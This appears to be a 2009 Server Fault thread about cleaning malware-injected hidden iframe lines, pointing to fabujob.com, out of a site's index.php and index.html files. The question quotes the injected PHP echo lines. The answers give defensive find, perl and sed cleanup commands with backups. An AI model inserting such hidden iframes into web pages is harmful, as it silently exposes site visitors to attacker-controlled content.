
I recently had some sort of malware on my computer that appended the following string(s) to every index.php and index.html ON THE WEBSERVER:

echo "<iframe src=\"http://fabujob.com/?click=AD4A4\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

echo "<iframe src=\"http://fabujob.com/?click=AC785\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

So the parameter after "click=" always changes. These two were only examples.

Is there a quick way to remove all of these?


EDIT: The files are on my webserver (FTP access only), so I can't simply run find on them...

yagmoth555
Jonas
5 Answers

2

one easy way to do this is by using find and grep, plus perl to do the edits.

first, construct a list of filenames that have been compromised:

find /path/to/web/site \( -name 'index.htm*' -o -name 'index.php' \) -print0 | \
  xargs -0 grep -l 'iframe src.*fabujob\.com' > /tmp/compromised-files.txt

next, use perl to edit the files and remove the exploit:

cat /tmp/compromised-files.txt | \
  xargs -d '\n' perl -n -i.BAK -e 'print unless m/fabujob\.com/i' 

(yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)

that will delete every line containing the string "fabujob.com" from each of the compromised files. It will also keep a backup of each file as filename.BAK so you can easily restore them if something goes wrong. you should delete them when you no longer need them.

this perl script is based on the sample you gave, which appears to indicate that the attack added an entire line containing the exploit, so this script prints every line EXCEPT those containing the exploit's URL. if that's not actually the case, then you'll have to come up with a more appropriate script :)

this is a generic technique that you can use to make any automated edits to a batch of files. you can use any perl code to do the job, and perl has a huge swag of text manipulation capabilities.

BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. that way it doesn't matter if you screw up the perl editing script...just rsync the original back over the working dir. once you've got the script exactly right, you can then run it on the real files.
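the copy-first workflow above can be sketched like this (all paths are throwaway /tmp examples standing in for the real site directories):

```shell
# make a pristine copy and a working copy (illustrative /tmp paths)
mkdir -p /tmp/site
echo 'original content' > /tmp/site/index.php
rsync -a /tmp/site/ /tmp/site-work/

# simulate a botched edit on the working copy...
echo 'botched edit' > /tmp/site-work/index.php

# ...then restore the working copy from the pristine original
rsync -a --delete /tmp/site/ /tmp/site-work/
```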

cas
  • Thanks for this extraordinarily awesome answer, but unfortunately I forgot to tell you that it is on my webserver (FTP), not on my local computer – Jonas Jul 18 '09 at 16:10
  • if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first. – cas Jul 18 '09 at 23:02
  • alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea. – cas Jul 18 '09 at 23:03
  • Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you! – Jonas Jul 18 '09 at 23:22
0

If you know you have no <iframe> tags in your documents, you can simply do

perl -i -n -e'print unless /<iframe/' $(find . -name index.html)

If you do have iframes, then you'll need to make your regex more exact.

Perl's -i flag is far-too-often overlooked. It means "edit in place". See http://petdance.com/perl/command-line-options.pdf for more examples of magic to be done in Perl from the command line.

Andy Lester
0

sed and find should help you, but sed takes some time to learn (enough that I can't come up with a working command off the top of my head right now).

Also, there are GUI editors that can find and replace across a whole directory tree (e.g., TextMate on the Mac). You would then use a regex to cover the variable part.

Sven
0

Try regexxer or rpl-type tools. Their whole purpose is project-wide replacements. They support recursive directory traversal and let you choose the file types to which replacements should be applied.

Saurabh Barjatiya
0

Assuming that the domain is always the same and shouldn't legitimately exist anywhere:

find <documentroot> \( -name 'index.html' -or -name 'index.php' \) \
    -exec sed -i'.bak' '/fabujob\.com/d' {} \;

Originals will be saved with the extension '.bak'. You can just use -i if you don't want backups.
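Before letting sed delete anything, it's worth a dry run that only lists what would match. A hedged sketch using a throwaway /tmp directory in place of the real document root:

```shell
# throwaway document root with one infected file (illustration only)
mkdir -p /tmp/docroot
printf '%s\n' 'real content' \
  'echo "<iframe src=\"http://fabujob.com/?click=X9\"></iframe>";' \
  > /tmp/docroot/index.php

# same find expression, but grep -Hn previews the lines sed would delete
find /tmp/docroot \( -name 'index.html' -or -name 'index.php' \) \
    -exec grep -Hn 'fabujob\.com' {} \;
```

Once the preview output contains only injected lines, swap the grep back for the sed command.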

Dan Carley